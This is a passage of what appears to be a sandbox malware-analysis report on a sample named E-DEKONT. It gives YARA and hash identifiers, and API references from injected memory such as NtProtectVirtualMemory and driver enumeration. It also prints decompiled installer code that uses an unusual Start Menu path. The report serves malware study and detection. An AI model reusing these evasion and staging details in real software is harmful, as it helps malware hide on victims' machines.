                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AWH$AWH$]kcg
                                                                            • API String ID: 0-257656276
                                                                            • Opcode ID: d1513043befa89909379df593d7c4593904e82bff6876f6009eff8ba4bb7193f
                                                                            • Instruction ID: 6ef7e6dcbb0504a9ddc9422983161c39b1978aa3166978d79733c9dd89af4376
                                                                            • Opcode Fuzzy Hash: d1513043befa89909379df593d7c4593904e82bff6876f6009eff8ba4bb7193f
                                                                            • Instruction Fuzzy Hash: 53B19E79A043069FCF34BE2889947EA37A39F92790F95806FDC8D97244DB3189C6C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B85012 Relevance: 4.0, Strings: 3, Instructions: 267COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AWH$AWH$]kcg
                                                                            • API String ID: 0-257656276
                                                                            • Opcode ID: 1fe32fd699baba6b3087c432605b61c23221a399b4d14c8a6258c496437b9f60
                                                                            • Instruction ID: 4699addfc0c5ab972f3f63e98556de552d5484a156149555c7ce5c30c557ec58
                                                                            • Opcode Fuzzy Hash: 1fe32fd699baba6b3087c432605b61c23221a399b4d14c8a6258c496437b9f60
                                                                            • Instruction Fuzzy Hash: 73913475604349DFDF30AE688D943DE37A7AF41BA0F96441ECC899B204D7354987CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B86198 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • K32EnumDeviceDrivers.KERNEL32(00000001,02B86F54), ref: 02B8652B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeviceDriversEnum
                                                                            • String ID:
                                                                            • API String ID: 22031212-0
                                                                            • Opcode ID: 74450a4b70aee14dc1ae06b7a1c4d133bc0608786366b377ad9990d222346584
                                                                            • Instruction ID: 6ea1b49dae8e75f626610cc71059c0f0f5f59d2c7784b7ee4485b787bda70c55
                                                                            • Opcode Fuzzy Hash: 74450a4b70aee14dc1ae06b7a1c4d133bc0608786366b377ad9990d222346584
                                                                            • Instruction Fuzzy Hash: 0B01B530504349CBCB28BE648A857ED337AAFC8344F1486FACE0F9E618D7359945CA02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B84F02 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL ref: 02B84FF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: 459d85822b8722b2eb9bb6aba24bf2e9ab06af5c2f04654d613941245588d026
                                                                            • Instruction ID: 70c7c30fbf86a40998c9b7917d2d818642f58b9393d02a1ae4cbae815800cca7
                                                                            • Opcode Fuzzy Hash: 459d85822b8722b2eb9bb6aba24bf2e9ab06af5c2f04654d613941245588d026
                                                                            • Instruction Fuzzy Hash: 24018F721002899FDB248E288C196EEB7A6EFD9710F56402EDC899B200C6709A458646
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403D3E Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 261 403d3e-403d50 262 403e91-403ea0 261->262 263 403d56-403d5c 261->263 265 403ea2-403eea GetDlgItem * 2 call 404217 SetClassLongW call 40140b 262->265 266 403eef-403f04 262->266 263->262 264 403d62-403d6b 263->264 269 403d80-403d83 264->269 270 403d6d-403d7a SetWindowPos 264->270 265->266 267 403f44-403f49 call 404263 266->267 268 403f06-403f09 266->268 283 403f4e-403f69 267->283 273 403f0b-403f16 call 401389 268->273 274 403f3c-403f3e 268->274 276 403d85-403d97 ShowWindow 269->276 277 403d9d-403da3 269->277 270->269 273->274 296 403f18-403f37 SendMessageW 273->296 274->267 282 4041e4 274->282 276->277 279 403da5-403dba DestroyWindow 277->279 280 403dbf-403dc2 277->280 285 4041c1-4041c7 279->285 287 403dc4-403dd0 SetWindowLongW 280->287 288 403dd5-403ddb 280->288 286 4041e6-4041ed 282->286 290 403f72-403f78 283->290 291 403f6b-403f6d call 40140b 283->291 285->282 298 4041c9-4041cf 285->298 287->286 294 403de1-403df2 GetDlgItem 288->294 295 403e7e-403e8c call 40427e 288->295 292 4041a2-4041bb DestroyWindow EndDialog 290->292 293 403f7e-403f89 290->293 291->290 292->285 293->292 300 403f8f-403fdc call 4062a4 call 404217 * 3 GetDlgItem 293->300 301 403e11-403e14 294->301 302 403df4-403e0b SendMessageW IsWindowEnabled 294->302 295->286 296->286 298->282 299 4041d1-4041da ShowWindow 298->299 299->282 331 403fe6-404022 ShowWindow KiUserCallbackDispatcher call 404239 EnableWindow 300->331 332 403fde-403fe3 300->332 305 403e16-403e17 301->305 306 403e19-403e1c 301->306 302->282 302->301 309 403e47-403e4c call 4041f0 305->309 310 403e2a-403e2f 306->310 311 403e1e-403e24 306->311 309->295 314 403e65-403e78 SendMessageW 310->314 316 403e31-403e37 310->316 311->314 315 403e26-403e28 311->315 314->295 315->309 319 403e39-403e3f call 40140b 316->319 320 403e4e-403e57 call 40140b 316->320 327 403e45 319->327 320->295 329 403e59-403e63 320->329 327->309 329->327 335 404024-404025 331->335 336 404027 331->336 332->331 337 404029-404057 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404059-40406a SendMessageW 337->338 339 40406c 337->339 340 404072-4040b1 call 40424c call 403d1f call 406282 lstrlenW call 4062a4 SetWindowTextW call 401389 338->340 339->340 340->283 351 4040b7-4040b9 340->351 351->283 352 4040bf-4040c3 351->352 353 4040e2-4040f6 DestroyWindow 352->353 354 4040c5-4040cb 352->354 353->285 356 4040fc-404129 CreateDialogParamW 353->356 354->282 355 4040d1-4040d7 354->355 355->283 357 4040dd 355->357 356->285 358 40412f-404186 call 404217 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 404188-4041a0 ShowWindow call 404263 358->363 363->285
                                                                            C-Code - Quality: 83%
                                                                            			E00403D3E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t144;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x42d230 = _t37;
					if(_t118 == 0x110) {
						 *0x434ee8 = _t128;
						 *0x42d244 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b210 = _t94;
						E00404217(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x433ec8);
						 *0x433eac = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x42d230 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x434f20;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E00404263(0x40b);
						while(1) {
							_t39 =  *0x42d230;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x434f24;
							if(_t41 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433eac - _t136;
							if( *0x433eac != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E004062A4(_t119, _t128, _t133, 0x444000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404217(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404217(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404217(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x434f8c - _t136;
							_v32 = _t51;
							if( *0x434f8c != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E00404239(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x42b210, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d244);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x42b210);
							}
							E0040424C();
							E00406282(0x42d248, E00403D1F());
							E004062A4(0x42d248, _t128, _t133,  &(0x42d248[lstrlenW(0x42d248)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x42d248); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433eb8); // executed
									 *0x42c220 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x434ee0,  *_t133 +  *0x433ec0 & 0x0000ffff, _t128,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x433eb8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404217(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x433eb8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433eac - _t136;
									if( *0x433eac != _t136) {
										goto L61;
									}
									ShowWindow( *0x433eb8, 8);
									E00404263(0x405);
									goto L58;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L61;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x433eb8);
						 *0x434ee8 = _t136;
						EndDialog(_t128,  *0x42ba18);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x433eb8, 0x40f, 0, 1);
						__eflags =  *0x433eac;
						return 0 |  *0x433eac == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x42d228, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42d228,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E0040427E(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x433eb8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x434f8c - _t136;
										if( *0x434f8c == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x42ba18 = 1;
											L21:
											_push(0x78);
											L22:
											E004041F0();
											goto L26;
										}
										E0040140B(_t130);
										 *0x42ba18 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x433eb8);
						 *0x433eb8 = _a12;
						L58:
						_t144 =  *0x42f248 - _t136; // 0x0
						if(_t144 == 0 &&  *0x433eb8 != _t136) {
							ShowWindow(_t128, 0xa);
							 *0x42f248 = 1;
						}
						L61:
						return 0;
					}
				}
			}































                                                                            0x00403d47
                                                                            0x00403d50
                                                                            0x00403e91
                                                                            0x00403e95
                                                                            0x00403e99
                                                                            0x00403e9b
                                                                            0x00403ea0
                                                                            0x00403eab
                                                                            0x00403eb6
                                                                            0x00403ebb
                                                                            0x00403ebd
                                                                            0x00403ebf
                                                                            0x00403ec2
                                                                            0x00403ec7
                                                                            0x00403ed5
                                                                            0x00403ee2
                                                                            0x00403ee9
                                                                            0x00403ee9
                                                                            0x00403eea
                                                                            0x00403eea
                                                                            0x00403eef
                                                                            0x00403ef5
                                                                            0x00403efc
                                                                            0x00403f02
                                                                            0x00403f04
                                                                            0x00403f44
                                                                            0x00403f49
                                                                            0x00403f4e
                                                                            0x00403f4e
                                                                            0x00403f53
                                                                            0x00403f5c
                                                                            0x00403f5e
                                                                            0x00403f63
                                                                            0x00403f69
                                                                            0x00403f6d
                                                                            0x00403f6d
                                                                            0x00403f72
                                                                            0x00403f78
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403f83
                                                                            0x00403f89
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403f92
                                                                            0x00403f9a
                                                                            0x00403f9f
                                                                            0x00403fa2
                                                                            0x00403fa8
                                                                            0x00403fad
                                                                            0x00403fb0
                                                                            0x00403fb6
                                                                            0x00403fbb
                                                                            0x00403fbe
                                                                            0x00403fc4
                                                                            0x00403fcc
                                                                            0x00403fd2
                                                                            0x00403fd8
                                                                            0x00403fdc
                                                                            0x00403fe3
                                                                            0x00403fe3
                                                                            0x00403fe3
                                                                            0x00403fed
                                                                            0x00403fff
                                                                            0x0040400b
                                                                            0x00404010
                                                                            0x0040401a
                                                                            0x00404020
                                                                            0x00404022
                                                                            0x00404027
                                                                            0x00404024
                                                                            0x00404024
                                                                            0x00404024
                                                                            0x00404037
                                                                            0x0040404f
                                                                            0x00404051
                                                                            0x00404057
                                                                            0x0040406c
                                                                            0x00404059
                                                                            0x00404062
                                                                            0x00404064
                                                                            0x00404064
                                                                            0x00404072
                                                                            0x00404083
                                                                            0x00404099
                                                                            0x004040a0
                                                                            0x004040a6
                                                                            0x004040aa
                                                                            0x004040af
                                                                            0x004040b1
                                                                            0x00000000
                                                                            0x004040b7
                                                                            0x004040b7
                                                                            0x004040b9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004040bf
                                                                            0x004040c3
                                                                            0x004040e8
                                                                            0x004040ee
                                                                            0x004040f4
                                                                            0x004040f6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040411c
                                                                            0x00404122
                                                                            0x00404124
                                                                            0x00404129
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040412f
                                                                            0x00404132
                                                                            0x00404135
                                                                            0x0040414c
                                                                            0x00404158
                                                                            0x00404171
                                                                            0x00404177
                                                                            0x0040417b
                                                                            0x00404180
                                                                            0x00404186
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404190
                                                                            0x0040419b
                                                                            0x00000000
                                                                            0x0040419b
                                                                            0x004040c5
                                                                            0x004040cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004040d1
                                                                            0x004040d7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004040dd
                                                                            0x004040b1
                                                                            0x004041a8
                                                                            0x004041b4
                                                                            0x004041bb
                                                                            0x00000000
                                                                            0x00403f06
                                                                            0x00403f06
                                                                            0x00403f09
                                                                            0x00403f3c
                                                                            0x00403f3c
                                                                            0x00403f3e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403f3e
                                                                            0x00403f0b
                                                                            0x00403f0f
                                                                            0x00403f14
                                                                            0x00403f16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403f26
                                                                            0x00403f2e
                                                                            0x00000000
                                                                            0x00403f34
                                                                            0x00403d62
                                                                            0x00403d62
                                                                            0x00403d66
                                                                            0x00403d6b
                                                                            0x00403d7a
                                                                            0x00403d7a
                                                                            0x00403d83
                                                                            0x00403d8c
                                                                            0x00403d97
                                                                            0x00403d97
                                                                            0x00403da3
                                                                            0x00403dbf
                                                                            0x00403dc2
                                                                            0x00403dd5
                                                                            0x00403ddb
                                                                            0x00403e7e
                                                                            0x00000000
                                                                            0x00403e87
                                                                            0x00403de1
                                                                            0x00403dee
                                                                            0x00403df0
                                                                            0x00403df2
                                                                            0x00403e11
                                                                            0x00403e11
                                                                            0x00403e14
                                                                            0x00403e19
                                                                            0x00403e1c
                                                                            0x00403e2c
                                                                            0x00403e2d
                                                                            0x00403e2f
                                                                            0x00403e65
                                                                            0x00403e78
                                                                            0x00000000
                                                                            0x00403e78
                                                                            0x00403e31
                                                                            0x00403e37
                                                                            0x00403e50
                                                                            0x00403e55
                                                                            0x00403e57
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403e59
                                                                            0x00403e45
                                                                            0x00403e45
                                                                            0x00403e47
                                                                            0x00403e47
                                                                            0x00000000
                                                                            0x00403e47
                                                                            0x00403e3a
                                                                            0x00403e3f
                                                                            0x00000000
                                                                            0x00403e3f
                                                                            0x00403e1e
                                                                            0x00403e24
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403e26
                                                                            0x00000000
                                                                            0x00403e26
                                                                            0x00403e16
                                                                            0x00000000
                                                                            0x00403e16
                                                                            0x00403dfc
                                                                            0x00403e03
                                                                            0x00403e09
                                                                            0x00403e0b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403e0b
                                                                            0x00403dc7
                                                                            0x00000000
                                                                            0x00403da5
                                                                            0x00403dab
                                                                            0x00403db5
                                                                            0x004041c1
                                                                            0x004041c1
                                                                            0x004041c7
                                                                            0x004041d4
                                                                            0x004041da
                                                                            0x004041da
                                                                            0x004041e4
                                                                            0x00000000
                                                                            0x004041e4
                                                                            0x00403da3

                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                                            • ShowWindow.USER32(?), ref: 00403D97
                                                                            • DestroyWindow.USER32 ref: 00403DAB
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                                            • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                                            • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                                            • EnableWindow.USER32(?,?), ref: 0040401A
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                                            • EnableMenuItem.USER32(00000000), ref: 00404037
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                                            • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                                            • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                                            • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID:
                                                                            • API String ID: 3282139019-0
                                                                            • Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                                            • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                                            • Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                                            • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403990 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 366 403990-4039a8 call 40665c 369 4039aa-4039b5 GetUserDefaultUILanguage call 4061c9 366->369 370 4039bc-4039f3 call 406150 366->370 373 4039ba 369->373 376 4039f5-403a06 call 406150 370->376 377 403a0b-403a11 lstrcatW 370->377 375 403a16-403a3f call 403c66 call 405c5b 373->375 383 403ad1-403ad9 call 405c5b 375->383 384 403a45-403a4a 375->384 376->377 377->375 390 403ae7-403b0c LoadImageW 383->390 391 403adb-403ae2 call 4062a4 383->391 384->383 386 403a50-403a6a call 406150 384->386 389 403a6f-403a78 386->389 389->383 392 403a7a-403a7e 389->392 394 403b8d-403b95 call 40140b 390->394 395 403b0e-403b3e RegisterClassW 390->395 391->390 396 403a90-403a9c lstrlenW 392->396 397 403a80-403a8d call 405b80 392->397 408 403b97-403b9a 394->408 409 403b9f-403baa call 403c66 394->409 398 403b44-403b88 SystemParametersInfoW CreateWindowExW 395->398 399 403c5c 395->399 403 403ac4-403acc call 405b53 call 406282 396->403 404 403a9e-403aac lstrcmpiW 396->404 397->396 398->394 402 403c5e-403c65 399->402 403->383 404->403 407 403aae-403ab8 GetFileAttributesW 404->407 411 403aba-403abc 407->411 412 403abe-403abf call 405b9f 407->412 408->402 418 403bb0-403bca ShowWindow call 4065ec 409->418 419 403c33-403c3b call 4053b9 409->419 411->403 411->412 412->403 424 403bd6-403be8 GetClassInfoW 418->424 425 403bcc-403bd1 call 4065ec 418->425 426 403c55-403c57 call 40140b 419->426 427 403c3d-403c43 419->427 430 403c00-403c23 DialogBoxParamW call 40140b 424->430 431 403bea-403bfa GetClassInfoW RegisterClassW 424->431 425->424 426->399 427->408 432 403c49-403c50 call 40140b 427->432 436 403c28-403c31 call 4038e0 430->436 431->430 432->408 436->402
                                                                            C-Code - Quality: 96%
                                                                            			E00403990(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434ef4;
				_t22 = E0040665C(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d248;
					L"1033" = 0x30;
					 *0x441002 = 0x78;
					 *0x441004 = 0;
					E00406150(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d248, 0);
					__eflags =  *0x42d248;
					if(__eflags == 0) {
						E00406150(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x42d248, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004061C9(L"1033", _t73 & 0x0000ffff);
				}
				E00403C66(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra";
				 *0x434f80 =  *0x434efc & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405C5B(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra") != 0) {
					L16:
					if(E00405C5B(_t98, _t86) == 0) {
						E004062A4(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x434ee0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ec8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C66(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E004053B9(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433eac;
								if( *0x433eac == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d228, 5); // executed
							_t39 = E004065EC("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004065EC("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433e80);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433e80);
								 *0x433ea4 = _t87;
								RegisterClassW(0x433e80);
							}
							_t44 = DialogBoxParamW( *0x434ee0,  *0x433ec0 + 0x00000069 & 0x0000ffff, 0, E00403D3E, 0); // executed
							E004038E0(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434ee0;
						 *0x433e84 = E00401000;
						 *0x433e90 =  *0x434ee0;
						 *0x433e94 = _t30;
						 *0x433ea4 = 0x40a380;
						if(RegisterClassW(0x433e80) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
